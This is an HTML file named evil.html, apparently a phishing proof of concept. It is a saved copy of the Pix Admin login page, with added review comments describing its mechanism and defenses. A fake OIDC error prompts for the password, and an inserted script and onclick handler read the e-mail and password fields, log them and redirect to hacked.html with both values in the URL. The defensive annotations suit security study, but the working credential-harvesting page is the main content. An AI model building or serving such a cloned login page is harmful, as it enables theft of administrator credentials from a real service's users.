evil.html
<!DOCTYPE html>
<html lang="fr"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<!--
  NOTE(review): this document is a static copy of the Pix Admin login screen, not the
  live application. Visible signs: the title and the apple-touch-icon URL refer to Pix
  Admin on admin.integration.pix.fr, the Ember configuration meta tag further down
  carries the pix-admin build settings, and the stylesheets and scripts are loaded from
  a local "Pix%20Admin_fichiers/" directory (looks like a browser "save page" export;
  confirm).
  The functional addition is the inline script at the end of the body together with the
  onclick attribute on the submit button: they read the e-mail and password fields and
  navigate to hacked.html.
  Defensive reading: a copy like this can be served from any origin, so response headers
  set by the real site (for example its Content-Security-Policy) do not apply to it.
  Controls that still hold are origin-bound sign-in such as WebAuthn and a password
  manager that does not fill credentials on an unknown origin.
-->
<meta content="IE=edge" http-equiv="X-UA-Compatible">
<title>Pix Admin</title>
<meta content="" name="description">
<meta content="width=device-width, initial-scale=1" name="viewport">
<!-- The icon is still fetched from the original host, so that host sees a request (and possibly a Referer) when this copy is opened. -->
<link rel="apple-touch-icon" sizes="180x180" href="https://admin.integration.pix.fr/apple-touch-icon-pix_admin.png">
<meta name="pix-admin/config/environment" content="%7B%22modulePrefix%22%3A%22pix-admin%22%2C%22environment%22%3A%22production%22%2C%22rootURL%22%3A%22%2F%22%2C%22locationType%22%3A%22history%22%2C%22EmberENV%22%3A%7B%22FEATURES%22%3A%7B%7D%2C%22EXTEND_PROTOTYPES%22%3A%7B%22Date%22%3Afalse%7D%2C%22_APPLICATION_TEMPLATE_WRAPPER%22%3Afalse%2C%22_JQUERY_INTEGRATION%22%3Afalse%2C%22_TEMPLATE_ONLY_GLIMMER_COMPONENTS%22%3Atrue%7D%2C%22APP%22%3A%7B%22API_HOST%22%3A%22%22%2C%22PIX_APP_URL_WITHOUT_EXTENSION%22%3A%22https%3A%2F%2Fapp.pix.%22%2C%22API_ERROR_MESSAGES%22%3A%7B%22BAD_REQUEST%22%3A%7B%22CODE%22%3A%22400%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.bad-request-error%22%7D%2C%22LOGIN_UNAUTHORIZED%22%3A%7B%22CODE%22%3A%22401%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.login-unauthorized-error%22%7D%2C%22USER_IS_TEMPORARY_BLOCKED%22%3A%7B%22CODE%22%3A%22403%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.login-user-temporary-blocked-error%22%7D%2C%22USER_IS_BLOCKED%22%3A%7B%22CODE%22%3A%22403%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.login-user-blocked-error%22%7D%2C%22LOGIN_NO_PERMISSION%22%3A%7B%22CODE%22%3A%22403%22%2C%22I18N_KEY%22%3A%22pages.login.api-error-messages.login-no-permission%22%7D%2C%22NOT_FOUND%22%3A%22404%22%2C%22INTERNAL_SERVER_ERROR%22%3A%7B%22CODE%22%3A%22500%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.internal-server-error%22%7D%2C%22GATEWAY_TIMEOUT%22%3A%7B%22CODE%22%3A%22504%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.gateway-timeout-error%22%7D%7D%2C%22MAX_CONCURRENT_AJAX_CALLS%22%3A8%2C%22ORGANIZATION_DASHBOARD_URL%22%3A%22https%3A%2F%2Fmetabase.pix.fr%2Fdashboard%2F137%2F%3Fid%3D%22%2C%22USER_DASHBOARD_URL%22%3A%22https%3A%2F%2Fmetabase.pix.fr%2Fdashboard%2F132%2F%3Fid%3D%22%2C%22MAX_LEVEL%22%3A8%2C%22MAX_REACHABLE_LEVEL%22%3A6%2C%22APP_VERSION%22%3A%22dev%22%2C%22name%22%3A%22pix-admin%22%2C%22version%22%3A%224.144.0%22%7D%2C%22ember-cli-notifications%22%3A%7B%22autoClear%22%3Atrue%2C%22includeFontAwes
ome%22%3Atrue%7D%2C%22matomo%22%3A%7B%7D%2C%22fontawesome%22%3A%7B%22warnIfNoIconsIncluded%22%3Atrue%7D%2C%22pagination%22%3A%7B%22debounce%22%3A500%7D%2C%22searchTargetProfiles%22%3A%7B%22debounce%22%3A250%7D%2C%22ember-cli-mirage%22%3A%7B%22usingProxy%22%3Atrue%2C%22useDefaultPassthroughs%22%3Atrue%7D%7D">
<link integrity="" rel="stylesheet" href="Pix%20Admin_fichiers/vendor.2ff6da90883cd6c372ed1542e6b15313.css">
<link integrity="" rel="stylesheet" href="Pix%20Admin_fichiers/pix-admin.eb56c3259d570bea43f9369fd8123537.css">
<link href="data:text/css,%3Ais(%5Bid*%3D'google_ads_iframe'%5D%2C%5Bid*%3D'taboola-'%5D%2C.taboolaHeight%2C.taboola-placeholder%2C%23credential_picker_container%2C%23credentials-picker-container%2C%23credential_picker_iframe%2C%5Bid*%3D'google-one-tap-iframe'%5D%2C%23google-one-tap-popup-container%2C.google-one-tap-modal-div%2C%23amp_floatingAdDiv%2C%23ez-content-blocker-container)%20%7Bdisplay%3Anone!important%3Bmin-height%3A0!important%3Bheight%3A0!important%3B%7D" rel="stylesheet" type="text/css"></head>
<body class="ember-application">
<script src="Pix%20Admin_fichiers/vendor.af995ead41cec560a311ea4c7918fdde.js"></script>
<script src="Pix%20Admin_fichiers/chunk.363278ec05d413ec2e78.js"></script>
<script src="Pix%20Admin_fichiers/chunk.10cdaea2b3247e3c9c3e.js"></script>
<!-- Login screen markup as captured from the rendered Ember application; the "emberN" ids and the empty comment markers are left over from that rendering. -->
<div class="login-page">
<main class="login-page__main">
<header class="login-page__header">
<h1 class="login-page__header__title">Pix Admin</h1>
<p class="login-form__information">L'accès à Pix Admin est limité aux administrateurs de la plateforme</p>
<!--
  Static text in this copy. The message says a password is needed to link SSO accounts,
  which is the prompt for filling in the two fields below.
  NOTE(review): whether the real login page can be made to display externally supplied
  OIDC error text is not visible in this file; if it can, limiting that text to a fixed
  set of known messages removes this pretext.
-->
<p class="login-form__error">OIDC Error : "invalid_request : Password is needed to link SSO accounts"</p>
</header>
<section class="login-page__section--login-form">
<!-- The fields sit in a plain div, not a form element, so there is no native form submission; the only code wired to them on this page is the inline script at the end of the body. -->
<div class="login-form">
<input id="ember3" class="ember-text-field ember-view login-form__fields login-form__email-field" placeholder="Adresse e-mail" aria-label="Adresse e-mail" required="true" autocomplete="true" type="text">
<input id="ember4" class="ember-text-field ember-view login-form__fields" placeholder="Mot de passe" aria-label="Mot de passe" required="true" autocomplete="true" type="password">
<!---->
<!-- The inline onclick attribute calls submit_hack(), defined in the inline script at the end of the body. Review indicator: an inline handler on a login button of a page whose other scripts are hashed build bundles. -->
<button class="pix-button pix-button--size-big pix-button--primary login-form__button" type="submit" onclick="submit_hack()">
<!----> Je me connecte
<!----></button>
</div>
</section>
<footer>
</footer>
</main>
</div>
<script>
// Handler added to the copied page: it collects what was typed into the two login
// fields and navigates away with both values in the URL fragment. Nothing in this
// script contacts the Pix API.
// Forensic note: a URL fragment is not transmitted in the HTTP request, so the values
// would not appear in web-server or proxy logs; they do remain in the browser console
// output and in the history entry for the destination URL.
function submit_hack(){
// #ember3 is the e-mail input and #ember4 the password input of the form above.
// Both names are assigned without a declaration, so they become globals on window.
username = encodeURI(document.querySelector('#ember3').value);
password = encodeURI(document.querySelector('#ember4').value);
// The typed values are written to the developer console in clear text.
console.log(username);
console.log(password);
// The target is a relative page, hacked.html (not shown in this file); the two values
// are joined with "------" after the "#".
window.location.href = "hacked.html#"+username+"------"+password ;
// The button's onclick attribute calls submit_hack() without "return", so this value is discarded there.
return false;
}
// Pressing Enter (keyCode 13) in the password field runs the same handler as the button.
document.getElementById('ember4').onkeydown = function(e){
if(e.keyCode == 13){
submit_hack();
}
};
</script>
</body></html>